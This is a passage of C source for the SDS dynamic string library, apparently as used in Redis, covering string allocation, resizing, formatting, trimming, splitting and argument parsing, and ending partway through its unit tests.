* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <assert.h>
#include <limits.h>
#include "sds.h"
#include "sdsalloc.h"
const char *SDS_NOINIT = "SDS_NOINIT";
static inline int sdsHdrSize(char type) {
switch(type&SDS_TYPE_MASK) {
case SDS_TYPE_5:
return sizeof(struct sdshdr5);
case SDS_TYPE_8:
return sizeof(struct sdshdr8);
case SDS_TYPE_16:
return sizeof(struct sdshdr16);
case SDS_TYPE_32:
return sizeof(struct sdshdr32);
case SDS_TYPE_64:
return sizeof(struct sdshdr64);
}
return 0;
}
static inline char sdsReqType(size_t string_size) {
if (string_size < 1<<5)
return SDS_TYPE_5;
if (string_size < 1<<8)
return SDS_TYPE_8;
if (string_size < 1<<16)
return SDS_TYPE_16;
#if (LONG_MAX == LLONG_MAX)
if (string_size < 1ll<<32)
return SDS_TYPE_32;
return SDS_TYPE_64;
#else
return SDS_TYPE_32;
#endif
}
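/* In other words: strings shorter than 32 bytes keep the length in the
 * flags byte itself (type 5); below 256 bytes an sdshdr8 is used, below
 * 64 KiB an sdshdr16, then sdshdr32, and sdshdr64 only where long is
 * 64 bits wide. */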
/* Create a new sds string with the content specified by the 'init' pointer
* and 'initlen'.
* If NULL is used for 'init' the string is initialized with zero bytes.
* If SDS_NOINIT is used, the buffer is left uninitialized;
*
* The string is always null-terminated (all the sds strings are, always) so
* even if you create an sds string with:
*
* mystring = sdsnewlen("abc",3);
*
* You can print the string with printf() as there is an implicit \0 at the
* end of the string. However the string is binary safe and can contain
* \0 characters in the middle, as the length is stored in the sds header. */
sds sdsnewlen(const void *init, size_t initlen) {
void *sh;
sds s;
char type = sdsReqType(initlen);
/* Empty strings are usually created in order to append. Use type 8
* since type 5 is not good at this. */
if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
int hdrlen = sdsHdrSize(type);
unsigned char *fp; /* flags pointer. */
sh = s_malloc(hdrlen+initlen+1);
if (sh == NULL) return NULL;
if (init==SDS_NOINIT)
init = NULL;
else if (!init)
memset(sh, 0, hdrlen+initlen+1);
s = (char*)sh+hdrlen;
fp = ((unsigned char*)s)-1;
switch(type) {
case SDS_TYPE_5: {
*fp = type | (initlen << SDS_TYPE_BITS);
break;
}
case SDS_TYPE_8: {
SDS_HDR_VAR(8,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_16: {
SDS_HDR_VAR(16,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_32: {
SDS_HDR_VAR(32,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_64: {
SDS_HDR_VAR(64,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
}
if (initlen && init)
memcpy(s, init, initlen);
s[initlen] = '\0';
return s;
}
/* Create an empty (zero length) sds string. Even in this case the string
* always has an implicit null term. */
sds sdsempty(void) {
return sdsnewlen("",0);
}
/* Create a new sds string starting from a null terminated C string. */
sds sdsnew(const char *init) {
size_t initlen = (init == NULL) ? 0 : strlen(init);
return sdsnewlen(init, initlen);
}
/* Duplicate an sds string. */
sds sdsdup(const sds s) {
return sdsnewlen(s, sdslen(s));
}
/* Free an sds string. No operation is performed if 's' is NULL. */
void sdsfree(sds s) {
if (s == NULL) return;
s_free((char*)s-sdsHdrSize(s[-1]));
}
/* Set the sds string length to the length as obtained with strlen(), so
* considering as content only up to the first null term character.
*
* This function is useful when the sds string is hacked manually in some
* way, like in the following example:
*
* s = sdsnew("foobar");
* s[2] = '\0';
* sdsupdatelen(s);
* printf("%d\n", sdslen(s));
*
* The output will be "2", but if we comment out the call to sdsupdatelen()
* the output will be "6" as the string was modified but the logical length
* remains 6 bytes. */
void sdsupdatelen(sds s) {
size_t reallen = strlen(s);
sdssetlen(s, reallen);
}
/* Modify an sds string in-place to make it empty (zero length).
* However the existing buffer is not discarded but kept as free space
* so that next append operations will not require allocations up to the
* number of bytes previously available. */
void sdsclear(sds s) {
sdssetlen(s, 0);
s[0] = '\0';
}
/* Enlarge the free space at the end of the sds string so that the caller
* is sure that, after calling this function, it can overwrite up to addlen
* bytes after the end of the string, plus one more byte for nul term.
*
* Note: this does not change the *length* of the sds string as returned
* by sdslen(), but only the free buffer space we have. */
sds sdsMakeRoomFor(sds s, size_t addlen) {
void *sh, *newsh;
size_t avail = sdsavail(s);
size_t len, newlen;
char type, oldtype = s[-1] & SDS_TYPE_MASK;
int hdrlen;
/* Return ASAP if there is enough space left. */
if (avail >= addlen) return s;
len = sdslen(s);
sh = (char*)s-sdsHdrSize(oldtype);
newlen = (len+addlen);
if (newlen < SDS_MAX_PREALLOC)
newlen *= 2;
else
newlen += SDS_MAX_PREALLOC;
type = sdsReqType(newlen);
/* Don't use type 5: the user is appending to the string and type 5 is
* not able to remember empty space, so sdsMakeRoomFor() must be called
* at every appending operation. */
if (type == SDS_TYPE_5) type = SDS_TYPE_8;
hdrlen = sdsHdrSize(type);
if (oldtype==type) {
newsh = s_realloc(sh, hdrlen+newlen+1);
if (newsh == NULL) return NULL;
s = (char*)newsh+hdrlen;
} else {
/* Since the header size changes, need to move the string forward,
* and can't use realloc */
newsh = s_malloc(hdrlen+newlen+1);
if (newsh == NULL) return NULL;
memcpy((char*)newsh+hdrlen, s, len+1);
s_free(sh);
s = (char*)newsh+hdrlen;
s[-1] = type;
sdssetlen(s, len);
}
sdssetalloc(s, newlen);
return s;
}
/* Reallocate the sds string so that it has no free space at the end. The
* contained string is not altered, but the next concatenation operation
* will require a reallocation.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdsRemoveFreeSpace(sds s) {
void *sh, *newsh;
char type, oldtype = s[-1] & SDS_TYPE_MASK;
int hdrlen, oldhdrlen = sdsHdrSize(oldtype);
size_t len = sdslen(s);
size_t avail = sdsavail(s);
sh = (char*)s-oldhdrlen;
/* Return ASAP if there is no space left. */
if (avail == 0) return s;
/* Check what would be the minimum SDS header that is just good enough to
* fit this string. */
type = sdsReqType(len);
hdrlen = sdsHdrSize(type);
/* If the type is the same, or at least a large enough type is still
* required, we just realloc(), letting the allocator to do the copy
* only if really needed. Otherwise if the change is huge, we manually
* reallocate the string to use the different header type. */
if (oldtype==type || type > SDS_TYPE_8) {
newsh = s_realloc(sh, oldhdrlen+len+1);
if (newsh == NULL) return NULL;
s = (char*)newsh+oldhdrlen;
} else {
newsh = s_malloc(hdrlen+len+1);
if (newsh == NULL) return NULL;
memcpy((char*)newsh+hdrlen, s, len+1);
s_free(sh);
s = (char*)newsh+hdrlen;
s[-1] = type;
sdssetlen(s, len);
}
sdssetalloc(s, len);
return s;
}
/* Return the total size of the allocation of the specified sds string,
* including:
* 1) The sds header before the pointer.
* 2) The string.
* 3) The free buffer at the end if any.
* 4) The implicit null term.
*/
size_t sdsAllocSize(sds s) {
size_t alloc = sdsalloc(s);
return sdsHdrSize(s[-1])+alloc+1;
}
/* Return the pointer of the actual SDS allocation (normally SDS strings
* are referenced by the start of the string buffer). */
void *sdsAllocPtr(sds s) {
return (void*) (s-sdsHdrSize(s[-1]));
}
/* Increment the sds length and decrement the left free space at the
* end of the string according to 'incr'. Also set the null term
* in the new end of the string.
*
* This function is used in order to fix the string length after the
* user calls sdsMakeRoomFor(), writes something after the end of
* the current string, and finally needs to set the new length.
*
* Note: it is possible to use a negative increment in order to
* right-trim the string.
*
* Usage example:
*
* Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the
* following schema, to cat bytes coming from the kernel to the end of an
* sds string without copying into an intermediate buffer:
*
* oldlen = sdslen(s);
* s = sdsMakeRoomFor(s, BUFFER_SIZE);
* nread = read(fd, s+oldlen, BUFFER_SIZE);
* ... check for nread <= 0 and handle it ...
* sdsIncrLen(s, nread);
*/
void sdsIncrLen(sds s, ssize_t incr) {
unsigned char flags = s[-1];
size_t len;
switch(flags&SDS_TYPE_MASK) {
case SDS_TYPE_5: {
unsigned char *fp = ((unsigned char*)s)-1;
unsigned char oldlen = SDS_TYPE_5_LEN(flags);
assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr)));
*fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS);
len = oldlen+incr;
break;
}
case SDS_TYPE_8: {
SDS_HDR_VAR(8,s);
assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_16: {
SDS_HDR_VAR(16,s);
assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_32: {
SDS_HDR_VAR(32,s);
assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_64: {
SDS_HDR_VAR(64,s);
assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr)));
len = (sh->len += incr);
break;
}
default: len = 0; /* Just to avoid compilation warnings. */
}
s[len] = '\0';
}
/* Grow the sds to have the specified length. Bytes that were not part of
* the original length of the sds will be set to zero.
*
* if the specified length is smaller than the current length, no operation
* is performed. */
sds sdsgrowzero(sds s, size_t len) {
size_t curlen = sdslen(s);
if (len <= curlen) return s;
s = sdsMakeRoomFor(s,len-curlen);
if (s == NULL) return NULL;
/* Make sure added region doesn't contain garbage */
memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */
sdssetlen(s, len);
return s;
}
/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the
* end of the specified sds string 's'.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscatlen(sds s, const void *t, size_t len) {
size_t curlen = sdslen(s);
s = sdsMakeRoomFor(s,len);
if (s == NULL) return NULL;
memcpy(s+curlen, t, len);
sdssetlen(s, curlen+len);
s[curlen+len] = '\0';
return s;
}
/* Append the specified null terminated C string to the sds string 's'.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscat(sds s, const char *t) {
return sdscatlen(s, t, strlen(t));
}
/* Append the specified sds 't' to the existing sds 's'.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscatsds(sds s, const sds t) {
return sdscatlen(s, t, sdslen(t));
}
/* Destructively modify the sds string 's' to hold the specified binary
* safe string pointed by 't' of length 'len' bytes. */
sds sdscpylen(sds s, const char *t, size_t len) {
if (sdsalloc(s) < len) {
s = sdsMakeRoomFor(s,len-sdslen(s));
if (s == NULL) return NULL;
}
memcpy(s, t, len);
s[len] = '\0';
sdssetlen(s, len);
return s;
}
/* Like sdscpylen() but 't' must be a null-terminated string so that the length
* of the string is obtained with strlen(). */
sds sdscpy(sds s, const char *t) {
return sdscpylen(s, t, strlen(t));
}
/* Helper for sdscatlonglong() doing the actual number -> string
* conversion. 's' must point to a string with room for at least
* SDS_LLSTR_SIZE bytes.
*
* The function returns the length of the null-terminated string
* representation stored at 's'. */
#define SDS_LLSTR_SIZE 21
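/* 21 bytes cover the worst cases: "-9223372036854775808" (20 chars) and
 * "18446744073709551615" (20 chars), plus the terminating null byte. */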
int sdsll2str(char *s, long long value) {
char *p, aux;
unsigned long long v;
size_t l;
/* Generate the string representation, this method produces
* a reversed string. */
v = (value < 0) ? -value : value;
p = s;
do {
*p++ = '0'+(v%10);
v /= 10;
} while(v);
if (value < 0) *p++ = '-';
/* Compute length and add null term. */
l = p-s;
*p = '\0';
/* Reverse the string. */
p--;
while(s < p) {
aux = *s;
*s = *p;
*p = aux;
s++;
p--;
}
return l;
}
/* Identical sdsll2str(), but for unsigned long long type. */
int sdsull2str(char *s, unsigned long long v) {
char *p, aux;
size_t l;
/* Generate the string representation, this method produces
* a reversed string. */
p = s;
do {
*p++ = '0'+(v%10);
v /= 10;
} while(v);
/* Compute length and add null term. */
l = p-s;
*p = '\0';
/* Reverse the string. */
p--;
while(s < p) {
aux = *s;
*s = *p;
*p = aux;
s++;
p--;
}
return l;
}
/* Create an sds string from a long long value. It is much faster than:
*
* sdscatprintf(sdsempty(),"%lld\n", value);
*/
sds sdsfromlonglong(long long value) {
char buf[SDS_LLSTR_SIZE];
int len = sdsll2str(buf,value);
return sdsnewlen(buf,len);
}
/* Like sdscatprintf() but gets va_list instead of being variadic. */
sds sdscatvprintf(sds s, const char *fmt, va_list ap) {
va_list cpy;
char staticbuf[1024], *buf = staticbuf, *t;
size_t buflen = strlen(fmt)*2;
int bufstrlen;
/* We try to start using a static buffer for speed.
* If not possible we revert to heap allocation. */
if (buflen > sizeof(staticbuf)) {
buf = s_malloc(buflen);
if (buf == NULL) return NULL;
} else {
buflen = sizeof(staticbuf);
}
/* Alloc enough space for buffer and \0 after failing to
* fit the string in the current buffer size. */
while(1) {
va_copy(cpy,ap);
bufstrlen = vsnprintf(buf, buflen, fmt, cpy);
va_end(cpy);
if (bufstrlen < 0) {
if (buf != staticbuf) s_free(buf);
return NULL;
}
if (((size_t)bufstrlen) >= buflen) {
if (buf != staticbuf) s_free(buf);
buflen = ((size_t)bufstrlen) + 1;
buf = s_malloc(buflen);
if (buf == NULL) return NULL;
continue;
}
break;
}
/* Finally concat the obtained string to the SDS string and return it. */
t = sdscatlen(s, buf, bufstrlen);
if (buf != staticbuf) s_free(buf);
return t;
}
/* Append to the sds string 's' a string obtained using printf-alike format
* specifier.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call.
*
* Example:
*
* s = sdsnew("Sum is: ");
* s = sdscatprintf(s,"%d+%d = %d",a,b,a+b).
*
* Often you need to create a string from scratch with the printf-alike
* format. When this is the need, just use sdsempty() as the target string:
*
* s = sdscatprintf(sdsempty(), "... your format ...", args);
*/
sds sdscatprintf(sds s, const char *fmt, ...) {
va_list ap;
char *t;
va_start(ap, fmt);
t = sdscatvprintf(s,fmt,ap);
va_end(ap);
return t;
}
/* This function is similar to sdscatprintf, but much faster as it does
* not rely on sprintf() family functions implemented by the libc that
* are often very slow. Moreover directly handling the sds string as
* new data is concatenated provides a performance improvement.
*
* However this function only handles an incompatible subset of printf-alike
* format specifiers:
*
* %s - C String
* %S - SDS string
* %i - signed int
* %I - 64 bit signed integer (long long, int64_t)
* %u - unsigned int
* %U - 64 bit unsigned integer (unsigned long long, uint64_t)
* %% - Verbatim "%" character.
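*
* A usage sketch, assuming 'name' is an sds string and 'age' an int:
*
*   s = sdscatfmt(s, "Name: %S, age: %i", name, age);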
*/
sds sdscatfmt(sds s, char const *fmt, ...) {
size_t initlen = sdslen(s);
const char *f = fmt;
long i;
va_list ap;
/* To avoid continuous reallocations, let's start with a buffer that
* can hold at least two times the format string itself. It's not the
* best heuristic but seems to work in practice. */
s = sdsMakeRoomFor(s, strlen(fmt)*2);
va_start(ap,fmt);
f = fmt; /* Next format specifier byte to process. */
i = initlen; /* Position of the next byte to write to dest str. */
while(*f) {
char next, *str;
size_t l;
long long num;
unsigned long long unum;
/* Make sure there is always space for at least 1 char. */
if (sdsavail(s)==0) {
s = sdsMakeRoomFor(s,1);
}
switch(*f) {
case '%':
next = *(f+1);
f++;
switch(next) {
case 's':
case 'S':
str = va_arg(ap,char*);
l = (next == 's') ? strlen(str) : sdslen(str);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,str,l);
sdsinclen(s,l);
i += l;
break;
case 'i':
case 'I':
if (next == 'i')
num = va_arg(ap,int);
else
num = va_arg(ap,long long);
{
char buf[SDS_LLSTR_SIZE];
l = sdsll2str(buf,num);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,buf,l);
sdsinclen(s,l);
i += l;
}
break;
case 'u':
case 'U':
if (next == 'u')
unum = va_arg(ap,unsigned int);
else
unum = va_arg(ap,unsigned long long);
{
char buf[SDS_LLSTR_SIZE];
l = sdsull2str(buf,unum);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,buf,l);
sdsinclen(s,l);
i += l;
}
break;
default: /* Handle %% and generally %<unknown>. */
s[i++] = next;
sdsinclen(s,1);
break;
}
break;
default:
s[i++] = *f;
sdsinclen(s,1);
break;
}
f++;
}
va_end(ap);
/* Add null-term */
s[i] = '\0';
return s;
}
/* Remove, from both the left and the right of the string, the contiguous runs
* of characters found in 'cset', which is a null-terminated C string.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call.
*
* Example:
*
* s = sdsnew("AA...AA.a.aa.aHelloWorld :::");
* s = sdstrim(s,"Aa. :");
* printf("%s\n", s);
*
* Output will be just "HelloWorld".
*/
sds sdstrim(sds s, const char *cset) {
char *start, *end, *sp, *ep;
size_t len;
sp = start = s;
ep = end = s+sdslen(s)-1;
while(sp <= end && strchr(cset, *sp)) sp++;
while(ep > sp && strchr(cset, *ep)) ep--;
len = (sp > ep) ? 0 : ((ep-sp)+1);
if (s != sp) memmove(s, sp, len);
s[len] = '\0';
sdssetlen(s,len);
return s;
}
/* Turn the string into a smaller (or equal) string containing only the
* substring specified by the 'start' and 'end' indexes.
*
* start and end can be negative, where -1 means the last character of the
* string, -2 the penultimate character, and so forth.
*
* The interval is inclusive, so the start and end characters will be part
* of the resulting string.
*
* The string is modified in-place.
*
* Example:
*
* s = sdsnew("Hello World");
* sdsrange(s,1,-1); => "ello World"
*/
void sdsrange(sds s, ssize_t start, ssize_t end) {
size_t newlen, len = sdslen(s);
if (len == 0) return;
if (start < 0) {
start = len+start;
if (start < 0) start = 0;
}
if (end < 0) {
end = len+end;
if (end < 0) end = 0;
}
newlen = (start > end) ? 0 : (end-start)+1;
if (newlen != 0) {
if (start >= (ssize_t)len) {
newlen = 0;
} else if (end >= (ssize_t)len) {
end = len-1;
newlen = (start > end) ? 0 : (end-start)+1;
}
} else {
start = 0;
}
if (start && newlen) memmove(s, s+start, newlen);
s[newlen] = 0;
sdssetlen(s,newlen);
}
/* Apply tolower() to every character of the sds string 's'. */
void sdstolower(sds s) {
size_t len = sdslen(s), j;
for (j = 0; j < len; j++) s[j] = tolower(s[j]);
}
/* Apply toupper() to every character of the sds string 's'. */
void sdstoupper(sds s) {
size_t len = sdslen(s), j;
for (j = 0; j < len; j++) s[j] = toupper(s[j]);
}
/* Compare two sds strings s1 and s2 with memcmp().
*
* Return value:
*
* positive if s1 > s2.
* negative if s1 < s2.
* 0 if s1 and s2 are exactly the same binary string.
*
* If two strings share exactly the same prefix, but one of the two has
* additional characters, the longer string is considered to be greater than
* the smaller one. */
int sdscmp(const sds s1, const sds s2) {
size_t l1, l2, minlen;
int cmp;
l1 = sdslen(s1);
l2 = sdslen(s2);
minlen = (l1 < l2) ? l1 : l2;
cmp = memcmp(s1,s2,minlen);
if (cmp == 0) return l1>l2? 1: (l1<l2? -1: 0);
return cmp;
}
/* Split 's' with separator in 'sep'. An array
* of sds strings is returned. *count will be set
* by reference to the number of tokens returned.
*
* On out of memory, a negative length, or a zero length
* separator, NULL is returned. A zero length input string
* returns an empty array with *count set to 0.
*
* Note that 'sep' is able to split a string using
* a multi-character separator. For example
* sdssplit("foo_-_bar","_-_"); will return two
* elements "foo" and "bar".
*
* This version of the function is binary-safe but
* requires length arguments. sdssplit() is just the
* same function but for zero-terminated strings.
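*
* A usage sketch, assuming 'line' is a null-terminated C string:
*
*   int count;
*   sds *parts = sdssplitlen(line, strlen(line), ",", 1, &count);
*   ... use parts[0] .. parts[count-1] ...
*   sdsfreesplitres(parts, count);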
*/
sds *sdssplitlen(const char *s, ssize_t len, const char *sep, int seplen, int *count) {
int elements = 0, slots = 5;
long start = 0, j;
sds *tokens;
if (seplen < 1 || len < 0) return NULL;
tokens = s_malloc(sizeof(sds)*slots);
if (tokens == NULL) return NULL;
if (len == 0) {
*count = 0;
return tokens;
}
for (j = 0; j < (len-(seplen-1)); j++) {
/* make sure there is room for the next element and the final one */
if (slots < elements+2) {
sds *newtokens;
slots *= 2;
newtokens = s_realloc(tokens,sizeof(sds)*slots);
if (newtokens == NULL) goto cleanup;
tokens = newtokens;
}
/* search the separator */
if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) {
tokens[elements] = sdsnewlen(s+start,j-start);
if (tokens[elements] == NULL) goto cleanup;
elements++;
start = j+seplen;
j = j+seplen-1; /* skip the separator */
}
}
/* Add the final element. We are sure there is room in the tokens array. */
tokens[elements] = sdsnewlen(s+start,len-start);
if (tokens[elements] == NULL) goto cleanup;
elements++;
*count = elements;
return tokens;
cleanup:
{
int i;
for (i = 0; i < elements; i++) sdsfree(tokens[i]);
s_free(tokens);
*count = 0;
return NULL;
}
}
/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */
void sdsfreesplitres(sds *tokens, int count) {
if (!tokens) return;
while(count--)
sdsfree(tokens[count]);
s_free(tokens);
}
/* Append to the sds string "s" an escaped string representation where
* all the non-printable characters (tested with isprint()) are turned into
* escapes in the form "\n\r\a...." or "\x<hex-number>".
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
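/* For instance, sdscatrepr(sdsempty(),"1\n",2) yields the five characters
* "1\n" quotes included, with the newline rendered as a backslash followed
* by 'n'. */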
sds sdscatrepr(sds s, const char *p, size_t len) {
s = sdscatlen(s,"\"",1);
while(len--) {
switch(*p) {
case '\\':
case '"':
s = sdscatprintf(s,"\\%c",*p);
break;
case '\n': s = sdscatlen(s,"\\n",2); break;
case '\r': s = sdscatlen(s,"\\r",2); break;
case '\t': s = sdscatlen(s,"\\t",2); break;
case '\a': s = sdscatlen(s,"\\a",2); break;
case '\b': s = sdscatlen(s,"\\b",2); break;
default:
if (isprint(*p))
s = sdscatprintf(s,"%c",*p);
else
s = sdscatprintf(s,"\\x%02x",(unsigned char)*p);
break;
}
p++;
}
return sdscatlen(s,"\"",1);
}
/* Helper function for sdssplitargs() that returns non zero if 'c'
* is a valid hex digit. */
int is_hex_digit(char c) {
return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
(c >= 'A' && c <= 'F');
}
/* Helper function for sdssplitargs() that converts a hex digit into an
* integer from 0 to 15 */
int hex_digit_to_int(char c) {
switch(c) {
case '0': return 0;
case '1': return 1;
case '2': return 2;
case '3': return 3;
case '4': return 4;
case '5': return 5;
case '6': return 6;
case '7': return 7;
case '8': return 8;
case '9': return 9;
case 'a': case 'A': return 10;
case 'b': case 'B': return 11;
case 'c': case 'C': return 12;
case 'd': case 'D': return 13;
case 'e': case 'E': return 14;
case 'f': case 'F': return 15;
default: return 0;
}
}
/* Split a line into arguments, where every argument can be in the
* following programming-language REPL-alike form:
*
* foo bar "newline are supported\n" and "\xff\x00otherstuff"
*
* The number of arguments is stored into *argc, and an array
* of sds is returned.
*
* The caller should free the resulting array of sds strings with
* sdsfreesplitres().
*
* Note that sdscatrepr() is able to convert back a string into
* a quoted string in the same format sdssplitargs() is able to parse.
*
* The function returns the allocated tokens on success, even when the
* input string is empty, or NULL if the input contains unbalanced
* quotes or closed quotes followed by non space characters
* as in: "foo"bar or "foo'
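*
* A usage sketch, assuming 'line' holds the raw input line:
*
*   int argc;
*   sds *argv = sdssplitargs(line, &argc);
*   if (argv) {
*       ... use argv[0] .. argv[argc-1] ...
*       sdsfreesplitres(argv, argc);
*   }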
*/
sds *sdssplitargs(const char *line, int *argc) {
const char *p = line;
char *current = NULL;
char **vector = NULL;
*argc = 0;
while(1) {
/* skip blanks */
while(*p && isspace(*p)) p++;
if (*p) {
/* get a token */
int inq=0; /* set to 1 if we are in "quotes" */
int insq=0; /* set to 1 if we are in 'single quotes' */
int done=0;
if (current == NULL) current = sdsempty();
while(!done) {
if (inq) {
if (*p == '\\' && *(p+1) == 'x' &&
is_hex_digit(*(p+2)) &&
is_hex_digit(*(p+3)))
{
unsigned char byte;
byte = (hex_digit_to_int(*(p+2))*16)+
hex_digit_to_int(*(p+3));
current = sdscatlen(current,(char*)&byte,1);
p += 3;
} else if (*p == '\\' && *(p+1)) {
char c;
p++;
switch(*p) {
case 'n': c = '\n'; break;
case 'r': c = '\r'; break;
case 't': c = '\t'; break;
case 'b': c = '\b'; break;
case 'a': c = '\a'; break;
default: c = *p; break;
}
current = sdscatlen(current,&c,1);
} else if (*p == '"') {
/* closing quote must be followed by a space or
* nothing at all. */
if (*(p+1) && !isspace(*(p+1))) goto err;
done=1;
} else if (!*p) {
/* unterminated quotes */
goto err;
} else {
current = sdscatlen(current,p,1);
}
} else if (insq) {
if (*p == '\\' && *(p+1) == '\'') {
p++;
current = sdscatlen(current,"'",1);
} else if (*p == '\'') {
/* closing quote must be followed by a space or
* nothing at all. */
if (*(p+1) && !isspace(*(p+1))) goto err;
done=1;
} else if (!*p) {
/* unterminated quotes */
goto err;
} else {
current = sdscatlen(current,p,1);
}
} else {
switch(*p) {
case ' ':
case '\n':
case '\r':
case '\t':
case '\0':
done=1;
break;
case '"':
inq=1;
break;
case '\'':
insq=1;
break;
default:
current = sdscatlen(current,p,1);
break;
}
}
if (*p) p++;
}
/* add the token to the vector */
vector = s_realloc(vector,((*argc)+1)*sizeof(char*));
vector[*argc] = current;
(*argc)++;
current = NULL;
} else {
/* Even on empty input string return something not NULL. */
if (vector == NULL) vector = s_malloc(sizeof(void*));
return vector;
}
}
err:
while((*argc)--)
sdsfree(vector[*argc]);
s_free(vector);
if (current) sdsfree(current);
*argc = 0;
return NULL;
}
/* Modify the string substituting all the occurrences of the set of
* characters specified in the 'from' string to the corresponding character
* in the 'to' array.
*
* For instance: sdsmapchars(mystring, "ho", "01", 2)
* will have the effect of turning the string "hello" into "0ell1".
*
* The function returns the sds string pointer, that is always the same
* as the input pointer since no resize is needed. */
sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) {
size_t j, i, l = sdslen(s);
for (j = 0; j < l; j++) {
for (i = 0; i < setlen; i++) {
if (s[j] == from[i]) {
s[j] = to[i];
break;
}
}
}
return s;
}
/* Join an array of C strings using the specified separator (also a C string).
* Returns the result as an sds string. */
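/* For example, given char *argv[] = {"a","b","c"}, calling
* sdsjoin(argv, 3, "-") returns the sds string "a-b-c". */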
sds sdsjoin(char **argv, int argc, char *sep) {
sds join = sdsempty();
int j;
for (j = 0; j < argc; j++) {
join = sdscat(join, argv[j]);
if (j != argc-1) join = sdscat(join,sep);
}
return join;
}
/* Like sdsjoin, but joins an array of SDS strings. */
sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) {
sds join = sdsempty();
int j;
for (j = 0; j < argc; j++) {
join = sdscatsds(join, argv[j]);
if (j != argc-1) join = sdscatlen(join,sep,seplen);
}
return join;
}
/* Wrappers to the allocators used by SDS. Note that SDS itself will
* just use the macros defined in sdsalloc.h in order to avoid paying
* the overhead of function calls. These wrappers are only meant for
* programs SDS is linked to, so that they can touch the SDS internals
* even if they use a different allocator. */
void *sds_malloc(size_t size) { return s_malloc(size); }
void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); }
void sds_free(void *ptr) { s_free(ptr); }
#if defined(SDS_TEST_MAIN)
#include <stdio.h>
#include "testhelp.h"
#include "limits.h"
#define UNUSED(x) (void)(x)
int sdsTest(void) {
{
sds x = sdsnew("foo"), y;
test_cond("Create a string and obtain the length",
sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0)
sdsfree(x);
x = sdsnewlen("foo",2);
test_cond("Create a string with specified length",
sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0)
x = sdscat(x,"bar");
test_cond("Strings concatenation",
sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0);
x = sdscpy(x,"a");
test_cond("sdscpy() against an originally longer string",
sdslen(x) == 1 && memcmp(x,"a\0",2) == 0)
x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk");
test_cond("sdscpy() against an originally shorter string",
sdslen(x) == 33 &&
memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0)
sdsfree(x);
x = sdscatprintf(sdsempty(),"%d",123);
test_cond("sdscatprintf() seems working in the base case",
sdslen(x) == 3 && memcmp(x,"123\0",4) == 0)
sdsfree(x);
x = sdscatprintf(sdsempty(),"a%cb",0);
test_cond("sdscatprintf() seems working with \\0 inside of result",
sdslen(x) == 3 && memcmp(x,"a\0""b\0",4) == 0)
{
sdsfree(x);
char etalon[1024*1024];
for (size_t i = 0; i < sizeof(etalon); i++) {
etalon[i] = '0';
}
x = sdscatprintf(sdsempty(),"%0*d",(int)sizeof(etalon),0);
test_cond("sdscatprintf() can print 1MB",
sdslen(x) == sizeof(etalon) && memcmp(x,etalon,sizeof(etalon)) == 0)
}
sdsfree(x);
x = sdsnew("--");
x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX);
test_cond("sdscatfmt() seems working in the base case",
sdslen(x) == 60 &&
memcmp(x,"--Hello Hi! World -9223372036854775808,"
"9223372036854775807--",60) == 0)
printf("[%s]\n",x);
sdsfree(x);
x = sdsnew("--");
x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX);
test_cond("sdscatfmt() seems working with unsigned numbers",
sdslen(x) == 35 &&
memcmp(x,"--4294967295,18446744073709551615--",35) == 0)
sdsfree(x);
x = sdsnew(" x ");
sdstrim(x," x");
test_cond("sdstrim() works when all chars match",
sdslen(x) == 0)
sdsfree(x);
